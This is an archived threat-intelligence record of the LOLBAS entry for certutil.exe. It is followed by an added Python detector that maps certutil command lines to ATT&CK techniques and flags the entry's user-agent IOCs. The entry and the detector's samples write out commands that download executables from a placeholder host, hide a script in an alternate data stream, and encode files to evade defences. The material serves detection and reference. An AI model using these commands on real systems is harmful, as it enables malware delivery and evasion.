{
	"id": "695e8784-83a7-49fc-aeac-eac249be74fe",
	"created_at": "2026-04-06T00:21:15.646806Z",
	"updated_at": "2026-04-10T13:12:58.395676Z",
	"deleted_at": null,
	"sha1_hash": "8b64ea9a9de4469ffde669e4f22c6fc60c1a426b",
	"title": "Certutil on LOLBAS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 63252,
	"plain_text": "Certutil on LOLBAS\r\nArchived: 2026-04-05 18:48:54 UTC\r\nCertutil.exe\r\nWindows binary used for handling certificates\r\nPaths:\r\nC:\\Windows\\System32\\certutil.exe\r\nC:\\Windows\\SysWOW64\\certutil.exe\r\nResources:\r\nhttps://twitter.com/Moriarty_Meng/status/984380793383370752\r\nhttps://twitter.com/mattifestation/status/620107926288515072\r\nhttps://twitter.com/egre55/status/1087685529016193025\r\nhttps://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/\r\nAcknowledgements:\r\nMatt Graeber (@mattifestation)\r\nMoriarty (@Moriarty_Meng)\r\negre55 (@egre55)\r\nLior Adar\r\nAdam (@hexacorn)\r\nSomeTestLeper (@SomeTestLeper)\r\nDetections:\r\nSigma: proc_creation_win_certutil_download.yml\r\nSigma: proc_creation_win_certutil_encode.yml\r\nSigma: proc_creation_win_certutil_decode.yml\r\nElastic: defense_evasion_suspicious_certutil_commands.toml\r\nElastic: command_and_control_certutil_network_connection.toml\r\nSplunk: certutil_download_with_urlcache_and_split_arguments.yml\r\nSplunk: certutil_download_with_verifyctl_and_split_arguments.yml\r\nSplunk: certutil_with_decode_argument.yml\r\nIOC: Certutil.exe creating new files on disk\r\nIOC: User agent Microsoft-CryptoAPI/10.0\r\nIOC: User agent CertUtil URL Agent\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Certutil/\r\nDownload\r\n1. Download and save an executable to disk in the current folder.\r\ncertutil.exe -urlcache -f https://www.example.org/file.exe file.exe\r\nUse case\r\nDownload file from Internet\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\n2. Download and save an executable to disk in the current folder when a file path is specified, or to %LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\\u003chash\u003e when it is not.\r\ncertutil.exe -verifyctl -f https://www.example.org/file.exe file.exe\r\nUse case\r\nDownload file from Internet\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\n3. Download and save an executable to %LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\\u003chash\u003e.\r\ncertutil.exe -URL https://www.example.org/file.exe\r\nUse case\r\nDownload file from Internet\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\nTags\r\nApplication: GUI\r\nAlternate data streams\r\n1. Download and save a .ps1 file to an Alternate Data Stream (ADS).\r\ncertutil.exe -urlcache -f https://www.example.org/file.ps1 C:\\Windows\\Temp\\file.ext:ttt\r\nUse case\r\nDownload file from Internet and save it in an NTFS Alternate Data Stream\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1564.004: NTFS File Attributes\r\nEncode\r\n1. Command to encode a file using Base64.\r\ncertutil -encode file.ext file.base64\r\nUse case\r\nEncode files to evade defensive measures\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1027.013: Encrypted/Encoded File\r\nDecode\r\n1. Command to decode a Base64-encoded file.\r\ncertutil -decode file.base64 file.ext\r\n2. Command to decode a hexadecimal-encoded file.\r\ncertutil -decodehex file.hex file.ext\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://lolbas-project.github.io/lolbas/Binaries/Certutil/"
	],
	"report_names": [
		"Certutil"
	],
	"threat_actors": [],
	"ts_created_at": 1775434875,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8b64ea9a9de4469ffde669e4f22c6fc60c1a426b.pdf",
		"text": "https://archive.orkl.eu/8b64ea9a9de4469ffde669e4f22c6fc60c1a426b.txt",
		"img": "https://archive.orkl.eu/8b64ea9a9de4469ffde669e4f22c6fc60c1a426b.jpg"
	}
}
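Added example, not part of the LOLBAS entry or of the record above: a Python classifier that maps certutil process-creation command lines to the patterns the entry lists (download via -urlcache/-verifyctl/-URL as T1105, an output path naming an NTFS alternate data stream as T1564.004, -encode as T1027.013, -decode/-decodehex as a decode finding), records the file each command writes (the entry's file-creation IOC, with the CryptnetUrlCache default when no path is given), and scans proxy log lines for the two user-agent IOCs. It accepts the "/" switch prefix, mixed case and a quoted full image path, not only the bare forms the entry shows. The sample command lines and proxy lines are constructed for this example; the proxy line layout (timestamp, client, method, URL, quoted user agent, status) is an assumption, and because the entry gives no ATT&CK ID for decoding, that finding is labelled by name only.

```python
import re

# certutil accepts its switches with either "-" or "/" (e.g. -urlcache, /URL).
_SWITCH = re.compile(r"^[-/]([A-Za-z]+)$")
_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Output path whose last component names an NTFS alternate data stream,
# e.g. C:\Windows\Temp\file.ext:ttt (the drive-letter colon is skipped).
_ADS = re.compile(r"^(?:[A-Za-z]:)?[^:]*:[^\\/:]+$")
_TOKEN = re.compile(r'"[^"]*"|\S+')
_UA_FIELD = re.compile(r'"([^"]*)"')

# Where certutil drops the download when no output path is given (from the entry).
CACHE_DIR = r"%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>"
# User agents the entry lists as IOCs for certutil network activity.
UA_IOCS = ("Microsoft-CryptoAPI/10.0", "CertUtil URL Agent")

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r"certutil.exe -urlcache -f https://www.example.org/file.exe file.exe",
    r'"C:\Windows\System32\certutil.exe" -verifyctl -f https://www.example.org/file.exe',
    r"CertUtil /URL https://www.example.org/file.exe",
    r"certutil.exe -urlcache -f https://www.example.org/file.ps1 C:\Windows\Temp\file.ext:ttt",
    r"certutil -encode file.ext file.base64",
    r"certutil -decode file.base64 file.ext",
    r"certutil -decodehex file.hex file.ext",
    r"certutil.exe -verify -urlfetch C:\cert.cer",  # routine admin use, no finding
]
# Constructed proxy lines in an assumed layout: timestamp client method url "ua" status.
SAMPLE_PROXY = [
    '2026-04-05T18:48:54Z 10.0.0.5 GET https://www.example.org/file.exe "Microsoft-CryptoAPI/10.0" 200',
    '2026-04-05T18:49:01Z 10.0.0.5 GET https://www.example.org/file.ps1 "CertUtil URL Agent" 200',
    '2026-04-05T18:49:07Z 10.0.0.5 GET https://www.example.org/ "Mozilla/5.0" 200',
]


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted paths as one token."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def is_certutil(image):
    """True when the image token is certutil, whatever directory it was run from."""
    return image.lower().replace("/", "\\").rsplit("\\", 1)[-1] in ("certutil", "certutil.exe")


def classify(cmdline):
    """Map one command line to the certutil abuse patterns listed on the entry.

    Returns a list of {"technique", "dest"} dicts; "dest" is the file the
    command writes, which is what the entry's file-creation IOC points at.
    """
    tokens = tokenize(cmdline)
    if not tokens or not is_certutil(tokens[0]):
        return []
    switches, positionals = set(), []
    for tok in tokens[1:]:
        m = _SWITCH.match(tok)
        if m:
            switches.add(m.group(1).lower())
        else:
            positionals.append(tok)

    findings = []
    urls = [p for p in positionals if _URL.match(p)]
    if urls and switches & {"urlcache", "verifyctl", "url"}:
        # -urlcache/-verifyctl write to the positional after the URL when one is
        # given; -URL takes no output path and always lands in the cache directory.
        nxt = positionals.index(urls[0]) + 1
        if "url" in switches or nxt >= len(positionals):
            dest = CACHE_DIR
        else:
            dest = positionals[nxt]
        findings.append({"technique": "T1105", "dest": dest})
        if _ADS.match(dest):
            findings.append({"technique": "T1564.004", "dest": dest})
    out = positionals[-1] if len(positionals) >= 2 else None
    if "encode" in switches:
        findings.append({"technique": "T1027.013", "dest": out})
    if switches & {"decode", "decodehex"}:
        # The entry gives no ATT&CK ID for decoding, so this finding is named only.
        findings.append({"technique": "decode", "dest": out})
    return findings


def flag_user_agents(proxy_lines):
    """Return (line_number, user_agent) for lines whose quoted UA field contains
    one of the entry's IOC strings. Microsoft-CryptoAPI/10.0 is also sent by
    Windows' own CRL/OCSP fetches, so treat a hit as a pivot, not a verdict."""
    hits = []
    for n, line in enumerate(proxy_lines, 1):
        m = _UA_FIELD.search(line)
        if m and any(ioc in m.group(1) for ioc in UA_IOCS):
            hits.append((n, m.group(1)))
    return hits


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev, "->", classify(ev) or "no finding")
    for n, ua in flag_user_agents(SAMPLE_PROXY):
        print("proxy line", n, "carries IOC user agent", ua)
```

Run it directly to get one verdict per sample line. In production, feed classify() the CommandLine field of Sysmon Event ID 1 or Security 4688 events and flag_user_agents() a proxy export; expect Microsoft-CryptoAPI/10.0 hits from routine certificate revocation checking and only escalate when they line up with a certutil process on the same host.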